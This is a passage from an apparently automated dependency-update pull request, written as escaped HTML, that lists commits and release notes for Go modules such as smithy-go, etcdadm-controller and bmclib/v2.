href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1256\"\u003e#1256\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/aba2972a0d9bae8bdfc9eec8160b2d0eeef7c005\"\u003e\u003ccode\u003eaba2972\u003c/code\u003e\u003c/a\u003e Staging bundle with pkg ctlr fix (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1255\"\u003e#1255\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/47ceca1fb64f400921691bd097e482bd5b881746\"\u003e\u003ccode\u003e47ceca1\u003c/code\u003e\u003c/a\u003e fix imagePullSecret schema validation (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1254\"\u003e#1254\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/5c41ff81f07899eae8a27ed0cb629d28a96585f2\"\u003e\u003ccode\u003e5c41ff8\u003c/code\u003e\u003c/a\u003e Staging bundle with fixed packages (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1253\"\u003e#1253\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/eks-anywhere-packages/compare/v0.4.5...v0.4.15\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/etcdadm-bootstrap-provider` from 1.0.17 to 1.0.19\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/a4b92b3f82826f1c85f473692d35e5311b04c7c4\"\u003e\u003ccode\u003ea4b92b3\u003c/code\u003e\u003c/a\u003e Bump cluster-api version (\u003ca href=\"https://redirect.github.com/aws/etcdadm-bootstrap-provider/issues/50\"\u003e#50\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/2ee5467f5dc9940d86a4f1885e3f1612a8d1272e\"\u003e\u003ccode\u003e2ee5467\u003c/code\u003e\u003c/a\u003e Adds subbu vakati to owners (\u003ca href=\"https://redirect.github.com/aws/etcdadm-bootstrap-provider/issues/51\"\u003e#51\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/e288bc1b6cd8867c52ae3da79bfb153913534f19\"\u003e\u003ccode\u003ee288bc1\u003c/code\u003e\u003c/a\u003e Add secure diagnostics endpoint with authentication to etcdadm bootstrap mana...\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/compare/v1.0.17...v1.0.19\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/etcdadm-controller` from 1.0.25 to 1.0.27\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-controller/commit/6795a4f86df4078f5258a25005028c6660fc36c8\"\u003e\u003ccode\u003e6795a4f\u003c/code\u003e\u003c/a\u003e Bump cluster-api version (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/75\"\u003e#75\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-controller/commit/72e7e5a190206423cea4519449b08a9c200971d4\"\u003e\u003ccode\u003e72e7e5a\u003c/code\u003e\u003c/a\u003e Adds subbu vakati to owners (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/74\"\u003e#74\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-controller/commit/d4476151cb03c0d699e5426632ff76a243ff0124\"\u003e\u003ccode\u003ed447615\u003c/code\u003e\u003c/a\u003e Add secure diagnostics endpoint with authentication to etcadm controller (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/73\"\u003e#73\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/etcdadm-controller/compare/v1.0.25...v1.0.27\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/smithy-go` from 1.20.3 to 1.25.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/smithy-go/releases\"\u003egithub.com/aws/smithy-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.25.0\u003c/h2\u003e\n\u003ch1\u003eRelease (2026-04-15)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.25.0\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for endpointBdd trait\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.22.4\u003c/h2\u003e\n\u003ch1\u003eRelease (2025-06-16)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.22.4\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Fix CBOR serd empty check for string and enum fields\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.22.3\u003c/h2\u003e\n\u003ch1\u003eRelease (2025-02-17)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.22.3\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Bump minimum Go version to 1.22 per our language support policy.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-27)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Bump minimum go version to 1.24.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-20)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.1\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add new middleware functions to get event stream output from middleware\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/smithy-go/blob/main/CHANGELOG.md\"\u003egithub.com/aws/smithy-go's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease (2026-04-23)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.25.1\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Fixed a memory leak in the LRU cache implementation used by some AWS services.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-04-15)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.25.0\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for endpointBdd trait\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-04-02)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.3\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Add additional sigv4 configuration.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go/aws-http-auth\u003c/code\u003e: \u003ca href=\"https://github.com/aws/smithy-go/blob/main/aws-http-auth/CHANGELOG.md#v113-2026-04-02\"\u003ev1.1.3\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Add additional sigv4 configuration.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-27)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Bump minimum go version to 1.24.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-20)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.1\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add new middleware functions to get event stream output from middleware\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2025-12-01)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/e094f45e716e33a1b950cf8bbe804790bf87f965\"\u003e\u003ccode\u003ee094f45\u003c/code\u003e\u003c/a\u003e Release 2026-04-23\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/214d45be3be5188c4d2fd9cf744c21f8b3dfbabc\"\u003e\u003ccode\u003e214d45b\u003c/code\u003e\u003c/a\u003e changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/3477da0b4dbf31de58ac375fe5abe5d268280824\"\u003e\u003ccode\u003e3477da0\u003c/code\u003e\u003c/a\u003e fix lrucache memory leak on existing item put (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/652\"\u003e#652\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/0d0b4d00f2430e62a790203b89fd76dceb4ae213\"\u003e\u003ccode\u003e0d0b4d0\u003c/code\u003e\u003c/a\u003e Bump Smithy version to 1.69.0 (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/650\"\u003e#650\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/be5e5ef0d73560eac9d71df7995b0eaffb9a8d71\"\u003e\u003ccode\u003ebe5e5ef\u003c/code\u003e\u003c/a\u003e check \u003ca href=\"https://github.com/enum\"\u003e\u003ccode\u003e@​enum\u003c/code\u003e\u003c/a\u003e on strings for cbor (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/649\"\u003e#649\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/5beb80e9da6bcad40dc304f062c27d8269abd67d\"\u003e\u003ccode\u003e5beb80e\u003c/code\u003e\u003c/a\u003e Ensure javadoc uses utf-8 (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/648\"\u003e#648\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/73bb8a7d6e222332d46eec7209ba3cd0ba520239\"\u003e\u003ccode\u003e73bb8a7\u003c/code\u003e\u003c/a\u003e Release 2026-04-15\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/f056c6fb0b43ba9bfeca6c29c8c1e1046437e45e\"\u003e\u003ccode\u003ef056c6f\u003c/code\u003e\u003c/a\u003e Changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/ee36afc3d70050ba990c8de8d65043ac11d1f9f4\"\u003e\u003ccode\u003eee36afc\u003c/code\u003e\u003c/a\u003e Implement BDD generator for \u003ca href=\"https://github.com/endpointBdd\"\u003e\u003ccode\u003e@​endpointBdd\u003c/code\u003e\u003c/a\u003e Smithy trait (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/647\"\u003e#647\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/3dbea7015f5ed79312e2a3cb6bbf39f7a26e46ea\"\u003e\u003ccode\u003e3dbea70\u003c/code\u003e\u003c/a\u003e Release 2026-04-02\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/smithy-go/compare/v1.20.3...v1.25.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/bmc-toolbox/bmclib/v2` from 2.1.1-0.20231206130132-1063371b9ed6 to 2.3.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/bmc-toolbox/bmclib/releases\"\u003egithub.com/bmc-toolbox/bmclib/v2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.3.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix SetBiosFromFile by \u003ca href=\"https://github.com/jakeschuurmans\"\u003e\u003ccode\u003e@​jakeschuurmans\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/403\"\u003ebmc-toolbox/bmclib#403\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci(mergify): upgrade configuration to current format by \u003ca href=\"https://github.com/mergify\"\u003e\u003ccode\u003e@​mergify\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/405\"\u003ebmc-toolbox/bmclib#405\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix media mounting eject implementation: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/406\"\u003ebmc-toolbox/bmclib#406\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump golang.org/x/crypto from 0.23.0 to 0.31.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/407\"\u003ebmc-toolbox/bmclib#407\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eNil pointer safety by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/408\"\u003ebmc-toolbox/bmclib#408\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate dependencies: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/409\"\u003ebmc-toolbox/bmclib#409\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate virtual media ejecting: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/410\"\u003ebmc-toolbox/bmclib#410\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEnables support for supermicro x11ssl-f and x11scz-f by \u003ca href=\"https://github.com/joelrebel\"\u003e\u003ccode\u003e@​joelrebel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/411\"\u003ebmc-toolbox/bmclib#411\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove virtual media ejecting and inserting: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/412\"\u003ebmc-toolbox/bmclib#412\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved power state limitations from RPC provider by \u003ca href=\"https://github.com/MrFlynn\"\u003e\u003ccode\u003e@​MrFlynn\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/416\"\u003ebmc-toolbox/bmclib#416\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCheck power state before issuing power off for ipmi: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/417\"\u003ebmc-toolbox/bmclib#417\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove sshclient package: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/420\"\u003ebmc-toolbox/bmclib#420\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix mergify configuration issue: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/425\"\u003ebmc-toolbox/bmclib#425\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDon't use all systems when no match is found: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/422\"\u003ebmc-toolbox/bmclib#422\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Redfish] Add support for UefiHttp boot by \u003ca href=\"https://github.com/chrigl\"\u003e\u003ccode\u003e@​chrigl\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/427\"\u003ebmc-toolbox/bmclib#427\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eadd \u0026quot;homeassistant\u0026quot; provider by \u003ca href=\"https://github.com/rpardini\"\u003e\u003ccode\u003e@​rpardini\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/428\"\u003ebmc-toolbox/bmclib#428\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(intelamt): implement Closer interface correctly by \u003ca href=\"https://github.com/oprinmarius\"\u003e\u003ccode\u003e@​oprinmarius\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/430\"\u003ebmc-toolbox/bmclib#430\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdds BMC, BIOS firmware install support for Supermicro X11SSL-F by \u003ca href=\"https://github.com/joelrebel\"\u003e\u003ccode\u003e@​joelrebel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/431\"\u003ebmc-toolbox/bmclib#431\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eredfishwrapper: fall back to System path for VirtualMedia discovery by \u003ca href=\"https://github.com/y-isono\"\u003e\u003ccode\u003e@​y-isono\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/433\"\u003ebmc-toolbox/bmclib#433\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eredfishwrapper: make SetVirtualMedia fall back on failure by \u003ca href=\"https://github.com/jmejco\"\u003e\u003ccode\u003e@​jmejco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/434\"\u003ebmc-toolbox/bmclib#434\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mergify\"\u003e\u003ccode\u003e@​mergify\u003c/code\u003e\u003c/a\u003e[bot] made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/405\"\u003ebmc-toolbox/bmclib#405\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/407\"\u003ebmc-toolbox/bmclib#407\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MrFlynn\"\u003e\u003ccode\u003e@​MrFlynn\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/416\"\u003ebmc-toolbox/bmclib#416\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chrigl\"\u003e\u003ccode\u003e@​chrigl\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/427\"\u003ebmc-toolbox/bmclib#427\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rpardini\"\u003e\u003ccode\u003e@​rpardini\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/428\"\u003ebmc-toolbox/bmclib#428\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/oprinmarius\"\u003e\u003ccode\u003e@​oprinmarius\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/430\"\u003ebmc-toolbox/bmclib#430\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/y-isono\"\u003e\u003ccode\u003e@​y-isono\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/433\"\u003ebmc-toolbox/bmclib#433\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jmejco\"\u003e\u003ccode\u003e@​jmejco\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/434\"\u003ebmc-toolbox/bmclib#434\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bmc-toolbox/bmclib/compare/v2.3.4...v2.3.5\"\u003ehttps://github.com/bmc-toolbox/bmclib/compare/v2.3.4...v2.3.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.3.4\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAllow specifying the Redfish system name: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/400\"\u003ebmc-toolbox/bmclib#400\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate redfish system name matching by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/401\"\u003ebmc-toolbox/bmclib#401\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eproviders/supermicro/supermicro.go: Initialize sum 'client' during serviceclient init by \u003ca href=\"https://github.com/splaspood\"\u003e\u003ccode\u003e@​splaspood\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/402\"\u003ebmc-toolbox/bmclib#402\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bmc-toolbox/bmclib/compare/v2.3.3...v2.3.4\"\u003ehttps://github.com/bmc-toolbox/bmclib/compare/v2.3.3...v2.3.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.3.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate virtual media mounting: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/398\"\u003ebmc-toolbox/bmclib#398\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eexpand response payload processing by \u003ca href=\"https://github.com/DoctorVin\"\u003e\u003ccode\u003e@​DoctorVin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/399\"\u003ebmc-toolbox/bmclib#399\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/bmc-toolbox/bmclib/commits/v2.3.5\"\u003ecompare 